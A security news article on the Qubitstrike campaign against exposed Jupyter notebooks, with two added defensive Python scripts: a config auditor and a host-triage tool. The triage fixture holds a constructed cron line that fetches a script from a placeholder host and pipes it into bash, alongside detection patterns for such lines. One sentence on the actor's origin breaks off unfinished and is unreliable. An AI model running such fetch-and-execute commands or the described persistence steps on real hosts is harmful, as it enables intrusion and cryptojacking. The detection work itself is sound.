Qubitstrike Launches a Rootkit and Crypto Mining Campaign Against Jupyter Notebooks

A threat actor, presumably from Tunisia, has been linked to a new campaign targeting exposed Jupyter Notebooks in a two-fold attempt to illicitly mine cryptocurrency and breach cloud environments.

Dubbed Qubitstrike by Cado, the intrusion set utilizes Telegram API to exfiltrate cloud service provider credentials following a successful compromise.

“The payloads for the Qubitstrike campaign are all hosted on codeberg.org – an alternative Git hosting platform, providing much of the same functionality as GitHub,” security researchers Matt Muir and Nate Bill said in a Wednesday write-up.

In the attack chain documented by the cloud security firm, publicly accessible Jupyter instances are breached and used to execute commands that retrieve a shell script (mi.sh) hosted on Codeberg.
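The initial access described above depends on Jupyter servers being reachable from the network with authentication switched off. The following checker, an added example that is not code from the article or from Cado, parses the traitlets-style assignments found in a `jupyter_server_config.py` (`c.ServerApp.*`, or the older `c.NotebookApp.*`) and flags the combination of settings that exposes a notebook in this way. Both sample configs are constructed; the argon2 hash in the hardened one is a placeholder.

```python
"""Audit a Jupyter server config for the settings that make a notebook
server reachable and unauthenticated, which is the exposure the article
says Qubitstrike abuses to run commands on public instances.

Added example, not code from the article or from Cado. It parses the
traitlets-style assignments used in jupyter_server_config.py
(c.ServerApp.*) and the older jupyter_notebook_config.py (c.NotebookApp.*);
both sample configs below are constructed for this demonstration.
"""
import ast
import re
import sys

# Matches lines such as:  c.ServerApp.ip = '0.0.0.0'
ASSIGN_RE = re.compile(r"^\s*c\.(ServerApp|NotebookApp)\.(\w+)\s*=\s*(.+?)\s*$")
LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def parse_config(text):
    """Return {setting: value} for every c.ServerApp/c.NotebookApp assignment."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0]  # drop trailing comments (sample values contain no '#')
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        _, key, raw = m.groups()
        try:
            settings[key] = ast.literal_eval(raw)
        except (ValueError, SyntaxError):
            settings[key] = raw  # non-literal expression: keep the source text
    return settings


def audit_jupyter_config(text):
    """Return (severity, message) findings; an empty list means no weak setting found."""
    s = parse_config(text)
    findings = []
    ip = s.get("ip", "localhost")  # Jupyter's default bind address
    exposed = ip not in LOOPBACK
    if exposed:
        findings.append(("high", f"ip={ip!r}: server reachable from other hosts"))
    # Jupyter generates a random token unless token is explicitly set to ''
    no_auth = s.get("token", "<generated>") == "" and not s.get("password")
    if no_auth:
        findings.append(("critical" if exposed else "medium",
                         "token='' with no password hash: anyone who reaches the port gets code execution"))
    if s.get("allow_origin") == "*":
        findings.append(("medium", "allow_origin='*': any website may issue cross-origin requests"))
    if s.get("allow_root") is True:
        findings.append(("low", "allow_root=True: a hijacked kernel runs as root"))
    if exposed and not s.get("certfile"):
        findings.append(("medium", "no certfile: remote sessions and credentials travel in cleartext"))
    return findings


# Constructed weak config: open to the network with authentication disabled.
WEAK_CONFIG = """
c.ServerApp.ip = '0.0.0.0'
c.ServerApp.port = 8888
c.ServerApp.token = ''
c.ServerApp.password = ''
c.ServerApp.allow_origin = '*'
c.ServerApp.allow_root = True
c.ServerApp.open_browser = False
"""

# Constructed hardened config: loopback only, password hash set (placeholder value).
HARDENED_CONFIG = """
c.ServerApp.ip = '127.0.0.1'
c.ServerApp.port = 8888
c.ServerApp.password = 'argon2:PLACEHOLDER_HASH'
c.ServerApp.allow_root = False
c.ServerApp.open_browser = False
"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONFIG
    for sev, msg in audit_jupyter_config(text) or [("info", "no weak settings found")]:
        print(f"[{sev}] {msg}")
```

Run it against a real config with `python audit_jupyter.py /path/to/jupyter_server_config.py`. The hardened form keeps the server on loopback and reaches it through an SSH tunnel or an authenticating reverse proxy, which is the usual way to avoid the "public instance with no token" condition the campaign relies on.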

The main payload, a shell script, is in charge of starting a cryptocurrency miner, creating persistence with a cron job, adding an attacker-controlled key to the .ssh/authorized_keys file for remote access, and using SSH to spread the malware to additional hosts.

The malware can also be used to download and install the Diamorphine rootkit, which hides malicious processes, and to exfiltrate captured Google Cloud and Amazon Web Services (AWS) credentials to the attacker via the Telegram bot API.

One notable feature of the attacks is the renaming of legitimate data transfer utilities such as curl and wget, apparently to evade detection and to prevent other users from running those tools.

“mi.sh will also iterate through a hardcoded list of process names and attempt to kill the associated processes,” the investigators stated. “This is likely to thwart any mining operations by competitors who may have previously compromised the system.”

The shell script additionally uses a hard-coded list of IP/port pairs previously linked to cryptojacking campaigns, together with the netstat command, to terminate any active network connections to those addresses.

The script also removes several Linux log files (such as /var/log/secure and /var/log/wtmp), another indication that the actors behind Qubitstrike are trying to evade detection.
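The traits listed over the last few paragraphs (an added SSH key, a cron job, curl and wget renamed away, wtmp and secure deleted) are all visible from the host's own files, so they make a reasonable first-pass triage. The script below is an added example and not code from the article or from Cado; it runs its checks over a plain snapshot dict so they can be exercised offline, and `collect_snapshot()` builds the same dict from the live host. The allow-listed admin key, the unknown key, the cron lines and the log sizes are all constructed, and the cron URL uses a `.invalid` placeholder domain.

```python
"""Host triage for the post-compromise traits the article attributes to
Qubitstrike's mi.sh: an attacker key appended to ~/.ssh/authorized_keys,
a cron job for persistence, curl/wget renamed out of the way, and
/var/log/secure and /var/log/wtmp deleted.

Added example, not code from the article or from Cado. All sample data is
constructed; collect_snapshot() gathers the same fields from the live host.
"""
import os
import re
import shutil

EXPECTED_TOOLS = ["curl", "wget"]
# /var/log/secure is the RHEL-family name; Debian-family hosts use auth.log instead
LOG_PATHS = ["/var/log/wtmp", "/var/log/secure", "/var/log/auth.log"]
# key type + base64 blob, tolerating a leading options field and a trailing comment
KEY_RE = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d{3})\s+([A-Za-z0-9+/=]+)")
# cron entries that download-and-pipe to a shell, run from scratch dirs, or decode payloads
SUSPICIOUS_CRON = re.compile(r"(curl|wget)[^\n]*\|\s*(ba)?sh\b|/(tmp|dev/shm|var/tmp)/|base64\s+-d", re.I)


def key_material(line):
    m = KEY_RE.search(line)
    return (m.group(1), m.group(2)) if m else None


def unknown_ssh_keys(authorized_keys, allowed_keys):
    """Lines whose key material is absent from the allow-list (comments/options are ignored)."""
    allowed = {key_material(k) for k in allowed_keys} - {None}
    hits = []
    for line in authorized_keys.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and key_material(line) not in allowed:
            hits.append(line)
    return hits


def suspicious_cron_entries(crontab_text):
    return [ln for ln in crontab_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and SUSPICIOUS_CRON.search(ln)]


def missing_tools(tool_paths):
    """tool_paths: {name: resolved path or None}; curl/wget vanishing is the renaming trait."""
    return [t for t in EXPECTED_TOOLS if not tool_paths.get(t)]


def missing_logs(log_sizes):
    """log_sizes: {path: bytes or None}; flags absent or zero-length logs that should be growing."""
    def gone(p):
        return log_sizes.get(p) in (None, 0)
    hits = []
    if gone("/var/log/wtmp"):
        hits.append("/var/log/wtmp")
    if gone("/var/log/secure") and gone("/var/log/auth.log"):
        hits.append("/var/log/secure or /var/log/auth.log")
    return hits


def triage(snapshot, allowed_keys):
    """Return [(category, detail)] findings; an empty list means none of the traits were seen."""
    return ([("ssh_key", k) for k in unknown_ssh_keys(snapshot["authorized_keys"], allowed_keys)]
            + [("cron", c) for c in suspicious_cron_entries(snapshot["crontab"])]
            + [("tool_missing", t) for t in missing_tools(snapshot["tools"])]
            + [("log_missing", p) for p in missing_logs(snapshot["logs"])])


def collect_snapshot(home=None):
    """Build the snapshot from the live host (root is needed to read other users' crontabs)."""
    home = home or os.path.expanduser("~")
    snap = {"authorized_keys": "", "crontab": "", "tools": {}, "logs": {}}
    ak = os.path.join(home, ".ssh", "authorized_keys")
    if os.path.isfile(ak):
        snap["authorized_keys"] = open(ak).read()
    for cron in ("/etc/crontab", "/var/spool/cron/root", "/var/spool/cron/crontabs/root"):
        try:
            snap["crontab"] += open(cron).read() + "\n"
        except OSError:
            pass
    for t in EXPECTED_TOOLS:
        snap["tools"][t] = shutil.which(t)
    for p in LOG_PATHS:
        snap["logs"][p] = os.path.getsize(p) if os.path.exists(p) else None
    return snap


ALLOWED_KEYS = ["ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEadminKEYconstructed000000000000 admin@bastion"]

# Constructed snapshot showing every trait at once.
COMPROMISED = {
    "authorized_keys": (
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEadminKEYconstructed000000000000 admin@bastion\n"
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCconstructedUNKNOWNkey0123456789 root@unknown\n"),
    "crontab": ("0 3 * * * root /usr/local/bin/backup.sh\n"
                "*/5 * * * * root curl -fsSL http://PLACEHOLDER.invalid/mi.sh | bash\n"),
    "tools": {"curl": None, "wget": None},
    "logs": {"/var/log/wtmp": None, "/var/log/secure": None, "/var/log/auth.log": None},
}

# Constructed clean snapshot from a Debian-family host (auth.log present, no secure).
CLEAN = {
    "authorized_keys": ALLOWED_KEYS[0] + "\n",
    "crontab": "0 3 * * * root /usr/local/bin/backup.sh\n",
    "tools": {"curl": "/usr/bin/curl", "wget": "/usr/bin/wget"},
    "logs": {"/var/log/wtmp": 14976, "/var/log/secure": None, "/var/log/auth.log": 52310},
}

if __name__ == "__main__":
    for category, detail in triage(collect_snapshot(), ALLOWED_KEYS):
        print(f"[{category}] {detail}")
```

Because the article also notes that Diamorphine hides processes, a clean result from on-host process or module listings proves little once the rootkit is loaded; the file-level traits above are harder to hide, and they should be corroborated from outside the host (cloud provider flow logs and CPU metrics for the Jupyter instance) rather than trusted on their own.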

Although the threat actor’s precise origins are still unknown, evidence suggests that it most likely originated

A more thorough look at the Codeberg repository also uncovered a Python implant (kdfs.py) designed to run on compromised hosts. Discord serves as a command-and-control (C2) mechanism for downloading and uploading files to and from the device.

Although the exact relationship between mi.sh and kdfs.py is still unknown, the Python backdoor is believed to facilitate deployment of the shell script; mi.sh also appears able to propagate on its own, independently of kdfs.py.

“Qubitstrike is a relatively sophisticated malware campaign, spearheaded by attackers with a particular focus on exploitation of cloud services,” according to the researchers.


Naturally, Qubitstrike’s main goal appears to be hijacking compute resources to mine cryptocurrency with XMRig. Even so, examination of the Discord C2 infrastructure reveals that, in practice, the operators could launch any kind of attack once they had access to these vulnerable hosts.
